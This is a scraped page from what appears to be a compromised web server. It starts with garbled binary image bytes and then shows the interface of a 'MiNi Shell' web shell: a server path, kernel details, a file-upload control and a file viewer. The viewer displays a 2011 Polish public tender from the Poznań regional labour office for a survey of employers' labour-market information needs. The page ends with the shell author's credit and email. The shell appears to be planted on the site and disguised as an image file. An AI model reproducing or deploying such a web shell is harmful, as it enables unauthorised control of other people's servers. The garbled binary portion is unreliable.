JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110505/130163-N-2011.html

<p class="kh_header"><b>Poznań: Potrzeby informacyjne pracodawców oraz instytucji województwa wielkopolskiego</b><br>
<b>Numer ogłoszenia: 130163 - 2011; data zamieszczenia: 05.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Poznaniu , ul. Kościelna 37, 60-537 Poznań, woj. wielkopolskie, tel. 061 8463819, faks 061 8463820.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Potrzeby informacyjne pracodawców oraz instytucji województwa wielkopolskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Przedmiotem zamówienia jest usługa przeprowadzenia badania społecznego pn. Potrzeby informacyjne pracodawców oraz instytucji województwa wielkopolskiego, zakończonego raportem.
2 Szczegółowy opis przedmiotu zamówienia:
2.1 Cel badania:
Celem badania jest określenie potrzeb informacyjnych pracodawców oraz instytucji działających na terenie województwa wielkopolskiego. 
2.2 Pytania badawcze:
2.2.1 Pytania ogólne:
1.	Jakie są kluczowe obszary decyzyjne związane z rynkiem pracy?
2.	Jakie informacje są niezbędne dla podejmowania racjonalnych decyzji w zakresie planowania i  ustalania strategii przedsiębiorstw i instytucji aktywnych na rynku pracy? Które z nich można pozyskać, a których nie?
3.	Jakie są źródła pozyskiwania informacji?
4.	Jak respondenci oceniają pozyskiwane przez siebie informacje?
5.	Jakie są braki/luki informacyjne?
6.	Jakie są preferencje respondentów w zakresie sposobu przekazywania informacji?
7.	Jaką postać przyjmuje wśród respondentów zarządzanie informacją?
8.	Jakie są oczekiwania respondentów względem Wielkopolskiego Obserwatorium Rynku Pracy?
9.	W jakiej formie powinna funkcjonować współpraca między pracodawcami 
i instytucjami w zakresie wymiany informacji dotyczących rynku pracy?
2.2.2 Pytania szczegółowe:
1.	Z jakich źródeł pozyskiwania informacji respondent korzysta? 
2.	O istnieniu jakich innych źródeł pozyskiwania informacji respondent wie, ale z nich nie korzysta i dlaczego nie korzysta? 
3.	Jak respondent ocenia rzetelność i użyteczność informacji pozyskiwanych 
z poszczególnych źródeł? 
4.	Które informacje są najłatwiej dostępne, a jakie najtrudniej? 
5.	W jakim stopniu informacje pozyskiwanie z poszczególnych źródeł są zadowalające dla respondentów?
6.	Czy respondent prowadzi badania własne? Jeśli tak, to na jaki temat? Jakie są trudności z prowadzeniem badań własnych?
7.	Czy respondent udostępnia posiadane przez siebie informacje? Jeśli tak, to jakie?
8.	Czy sposób, w jaki poszczególne informacje są przekazywane, jest dla respondenta zadowalający?
9.	Na jakie informacje jest zapotrzebowanie wśród respondentów? 
10.	W jaki sposób i w jakiej formie respondenci chcieliby otrzymywać informacje?
11.	Czy istnieje zależność informacyjna pomiędzy pracodawcami i instytucjami edukacyjnymi?
12.	Jaką postać przyjmuje współpraca respondentów z innymi instytucjami w zakresie wymiany informacji? Na ile przydatna jest taka współpraca?
13.	W jaki sposób respondenci gromadzą informację?
14.	Jakie informacje oraz w jaki sposób są wykorzystywane podczas realizacji zadań instytucji?
15.	Jakie znaczenie mają informacje w poszczególnych obszarach decyzyjnych?
16.	Czy na podstawie posiadanych informacji respondenci prowadzą analizy? Jeśli tak, to jakie?
17.	Czy informacje są wykorzystywane do tworzenia prognoz? Jeśli tak, to jakie?
18.	Jaką rolę odgrywa informacja w obszarze ZZL?
19.	Czy respondenci wykorzystują informacje pochodzące od publicznych służb zatrudnienia? Jeśli tak to jakie? 
20.	Jak respondenci oceniają informacje dot. rynku pracy przekazywane przez publiczne służby zatrudnienia?
21.	Co respondenci wiedzą o funkcjonowaniu WORP?
22.	Jakie zdaniem respondentów informacje WORP powinien gromadzić?
23.	Jakie problemy zdaniem respondentów powinny być tematem badań realizowanych przez WORP?
24.	 Jakie analizy zdaniem respondentów powinien realizować WORP?
25.	Czy respondenci są zainteresowani współpracą z WORP w zakresie wymiany informacji? 
26.	W  jaki sposób WORP powinno upowszechniać wyniki swojej pracy? 
27.	Co powinno zmienić się w polityce informacyjnej by ograniczyć niepewność, ryzyko podejmowanych decyzji?
28.	Jakie czynniki zdaniem respondentów utrudniają współpracę w zakresie wymiany informacji?
29.	Z jakimi podmiotami respondenci chcieliby nawiązać współpracę w zakresie wymiany informacji?
30.	Jaka powinna być rola poszczególnych partnerów w zakresie wymiany informacji? 
31.	W jakiej formie powinna funkcjonować wymiana informacji dot. rynku pracy między instytucjami? 
3.3 Źródła informacji.
Badanie powinno zostać przeprowadzone przy zastosowaniu ankiety bezpośredniej, opartej o kwestionariusz częściowo wystandaryzowany. Ankieta powinna zostać przeprowadzona 
z osobą mającą wpływ na politykę kadrową przedsiębiorstwa/instytucji.
Badanie powinno zostać zrealizowane na dwóch kategoriach jednostek:
1)	przedsiębiorstwach - próba losowa 1070 przedsiębiorstw spośród małych i średnich pracodawców oraz wszyscy pracodawcy zatrudniający powyżej 250 pracowników 
z terenu województwa wielkopolskiego;
2)	instytucjach - próba losowa 385 instytucji wymienionych w sekcji P oraz sekcji 
O Polskiej Klasyfikacji Działalności 2007 oraz wszystkie powiatowe urzędy pracy. 
Dobór próby powinien być wielostopniowy warstwowo-losowy, przeprowadzony we wszystkich powiatach województwa wielkopolskiego. Za kryterium warstwowania należy przyjąć: 
1)	dla próby przedsiębiorstw: powiat  jego usytuowanie względem centrum subregionu (centrum, graniczący z centrum oraz peryferyjny - nie graniczący z centrum) oraz branżę;
2)	dla próby instytucji: powiat  jego usytuowanie względem centrum subregionu (centrum, graniczący z centrum oraz peryferyjny - nie graniczący z centrum) oraz sekcję PKD 2007.
Dla każdej próby powinien zostać przeprowadzony pilotaż (na 30 jednostkach 
z zachowaniem reprezentacji kategorii warstwowania).
2.4 Harmonogram:

Lp.	ZADANIE	TERMIN REALIZACJI
1.	Sporządzenie w konsultacji z WUP listy poszukiwanych informacji wraz z określeniem poziomu ich pomiaru	3 dni robocze od dnia podpisania umowy
2.	Sporządzenie narzędzia badawczego (ankiety)	3 dni robocze od dnia akceptacji przez WUP zadania nr 1.
3.	Sporządzenie i przedstawienie próby badawczej (wraz warstwowaniem)	3 dni robocze od dnia akceptacji przez WUP zadania nr 1. Zadanie wykonywane równolegle z zadaniem nr 2.
4.	Przeprowadzenie badań pilotażowych - przedstawienie sprawozdania z jego wykonania wraz z zakresem wprowadzanych zmian do akceptacji przez WUP.	5 dni roboczych od dnia akceptacji przez WUP zadania nr 2 i 3.
5.	Przeprowadzenie badań zasadniczych zakończone sporządzeniem ok. 70 (+/-4) stronicowego raportu i 10 stronicowego streszczenia raportu	28 dni roboczych od akceptacji przez WUP zadania nr 4, lecz nie później niż do 11.07.2011
6.	Przygotowanie treści publikacji i projektu graficznego okładki	3 dni robocze od akceptacji przez WUP zadania nr 5
7.	Dostarczenie do Zamawiającego wydrukowanej publikacji 	Nie później niż do 29.07.2011 r 

2.5 Realizacja zamówienia
Przez wykonanie zamówienia rozumie się dostarczenie przez Wykonawcę:
a) raportu z badania w wersji elektronicznej (e-mail, CD-ROM) i papierowej (5 egzemplarzy w formacie A4). Wykonawca jest zobowiązany do zachowania następującej struktury raportu:
	spis treści;
	wprowadzenie (opis przedmiotu badania, jego założeń i celów);
	opis zastosowanej metodologii (w tym opis próby badawczej);
	opis wyników badania (analiza, interpretacja i prezentacja wyników);
	wnioski i konkluzje. Przy każdym wniosku powinien znaleźć się odnośnik do konkretnej części raportu, czyli jego uzasadnienia w tekście.
Raport musi być napisany zwięzłym i przejrzystym językiem, a każdy z rozdziałów kończyć się krótkim podsumowaniem. 
b) aneksu do raportu zawierającego próby badawcze, narzędzia badawcze, zestawienia tabelaryczne odpowiedzi itd. (wersja elektroniczna na nośniku elektronicznym typu: CD-ROM, DVD);
c) streszczenia raportu zawierającego: krótki opis badania, najważniejsze wyniki, oceny i wnioski (10 egzemplarzy w wersji papierowej - nie więcej niż 10 stron druku w formacie A5 oraz wersję elektroniczną - e-mail, CD-ROM);
d) publikacji raportu: Wykonawca jest zobowiązany do opracowania graficznego publikacji wraz z okładką, przygotowania do druku (w tym m.in. skład, łamanie, korekta techniczna i edytorska, oprawa), druku, transportu i dostarczenia publikacji   w stanie nienaruszonym wraz z rozładunkiem do miejsca wskazanego przez Zamawiającego na koszt Wykonawcy. Projekt graficzny okładki oraz opracowanie graficzne treści publikacji zostaną przygotowane przez Wykonawcę. Końcowy wygląd publikacji zostanie uzgodniony 
z Zamawiającym i będzie wymagał pisemnej akceptacji Zamawiającego. Wykonawca wykona projekt graficzny publikacji obejmujący maks. 80 stron (w tym m. in. okładki, układ stron - rozkład tekstu, inne elementy graficzne) publikacji. Wykonawca jest zobowiązany do uwzględnienia zmian zgłoszonych przez Zamawiającego w tekście oraz całym opracowaniu przygotowanej publikacji.
Parametry techniczne: format publikacji 165 mm/235 mm (szerokość/wysokość) 
+/- 10mm, papier dwustronnie kredowany o gramaturze 250 g/m2 (okładka: 4 strony) oraz papier zwykły 135 g/m2 (pozostałe strony oprócz okładki); druk dwustronny pełen kolor wraz z grafiką, oprawa publikacji zeszytowa; czcionka nie mniejsza niż 10. Ilość nakładu 150 szt. Wzór okładki będzie podlegał akceptacji Zamawiającego. Akceptacji Zamawiającego będzie podlegać również wzór stopki. Publikacja będzie zawierała na stronie tytułowej logotyp Wojewódzkiego Urzędu Pracy w Poznaniu, logotyp Wielkopolskiego Obserwatorium Rynku Pracy, logo UE z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego, logo Kapitał Ludzki Narodowa Strategia Spójności oraz informację publikacja bezpłatna, a także miesięczną i roczną datę wydruku,  natomiast na tylnej stronie okładki informację: publikacja współfinansowana ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Treść publikacji musi zawierać informacje o: nakładzie, dacie wydania publikacji, danych adresowych wydawcy, Instytucji Pośredniczącej zlecającej badanie (w tym logo i adres strony internetowej WORP), źródle finansowania, głównych odbiorcach publikacji, a także charakteryzować się przejrzystością szaty graficznej oraz musi spełniać w zakresie języka publikacji zasadę równości szans kobiet i mężczyzn  (opis wyników w podziale na kobiety 
i mężczyzn, stosowanie określeń: uczestnik, uczestniczka itp.) .
Wykonawca jest zobowiązany stosować się do obecnie obowiązujących zapisów Wytycznych dotyczących oznaczania projektów w ramach PO KL. Publikacje muszą być zapakowane w papier pakowy w równych ilościach po 50 egzemplarzy w paczce. Na każdej paczce ma być zamieszczona informacja dotycząca tytułu i ilości egzemplarzy publikacji w danej paczce..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-1, 79.82.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - sposób realizacji badania - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wup.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Poznaniu, ul. Kościelna 37, 60-537 Poznań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2011 godzina 09:20, miejsce: Wojewódzki Urząd Pracy w Poznaniu, ul. Kościelna 37, 60-537 Poznań.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 10.06.2011.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy w ramach Poddziałania 6.1.2 PO KL Wielkopolskie Obserwatorium Rynku Pracy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com